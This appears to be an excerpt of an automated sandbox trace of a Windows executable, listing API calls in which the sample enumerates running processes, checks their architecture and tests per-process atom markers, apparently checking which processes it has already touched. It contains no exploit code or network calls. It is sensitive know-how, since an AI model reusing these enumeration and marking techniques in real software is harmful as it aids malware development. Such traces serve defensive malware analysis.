	[0072.156] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.156] CloseHandle (hObject=0x224) returned 1
	[0072.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0072.156] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.156] CloseHandle (hObject=0x224) returned 1
	[0072.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0072.156] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.157] CloseHandle (hObject=0x224) returned 1
	[0072.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0072.157] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.157] CloseHandle (hObject=0x224) returned 1
	[0072.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72ea18, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0072.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0072.157] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.157] CloseHandle (hObject=0x224) returned 1
	[0072.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x7721b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0072.157] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.157] CloseHandle (hObject=0x224) returned 1
	[0072.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x7721d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0072.157] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.157] CloseHandle (hObject=0x224) returned 1
	[0072.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728978, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0072.158] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.158] CloseHandle (hObject=0x224) returned 1
	[0072.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0072.158] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.158] CloseHandle (hObject=0x224) returned 1
	[0072.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7289f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0072.158] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.158] CloseHandle (hObject=0x224) returned 1
	[0072.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e770, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0072.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0072.158] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.158] CloseHandle (hObject=0x224) returned 1
	[0072.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72ea18, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0072.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.158] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.158] CloseHandle (hObject=0x224) returned 1
	[0072.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772218, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.159] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.160] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0072.160] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.160] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0072.160] GetLastError () returned 0x5
	[0072.160] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.161] GetLastError () returned 0x5
	[0072.162] GetLastError () returned 0x5
	[0072.162] GetLastError () returned 0x5
	[0072.162] GetLastError () returned 0x5
	[0072.162] GetLastError () returned 0x5
	[0072.162] GetLastError () returned 0x5
	[0072.162] GetLastError () returned 0x5
	[0072.162] GetLastError () returned 0x5
	[0072.162] GetLastError () returned 0x5
	[0072.162] GetLastError () returned 0x5
	[0072.162] GetLastError () returned 0x5
	[0072.162] GetLastError () returned 0x5
	[0072.162] GetLastError () returned 0x5
	[0072.162] GetLastError () returned 0x5
	[0072.162] GetLastError () returned 0x5
	[0072.162] GetLastError () returned 0x5
	[0072.162] GetLastError () returned 0x5
	[0072.162] GetLastError () returned 0x5
	[0072.162] GetLastError () returned 0x5
	[0072.162] GetLastError () returned 0x5
	[0072.162] GetLastError () returned 0x5
	[0072.162] GetLastError () returned 0x5
	[0072.162] GetLastError () returned 0x5
	[0072.162] GetLastError () returned 0x5
	[0072.162] GetLastError () returned 0x5
	[0072.162] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.162] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0072.162] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.162] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0072.162] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0072.163] CloseHandle (hObject=0x224) returned 1
	[0072.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0072.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0072.163] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.163] CloseHandle (hObject=0x224) returned 1
	[0072.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e838, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0072.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0072.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0072.163] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.163] CloseHandle (hObject=0x224) returned 1
	[0072.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x7721a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16d68) returned 0xc0000004
	[0072.198] VirtualAlloc (lpAddress=0x0, dwSize=0x16e68, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0072.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16e68, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0072.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0072.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x7721d0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0072.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0072.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0072.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0072.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0072.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0072.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0072.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0072.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0072.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0072.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dd30, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0072.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0072.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0072.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0072.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0072.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0072.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0072.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0072.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0072.226] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.226] CloseHandle (hObject=0x224) returned 1
	[0072.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x7721b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0072.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0072.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728a98, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0072.226] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.226] CloseHandle (hObject=0x224) returned 1
	[0072.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728978, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0072.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0072.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0072.227] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.227] CloseHandle (hObject=0x224) returned 1
	[0072.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0072.227] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.227] CloseHandle (hObject=0x224) returned 1
	[0072.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0072.227] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.227] CloseHandle (hObject=0x224) returned 1
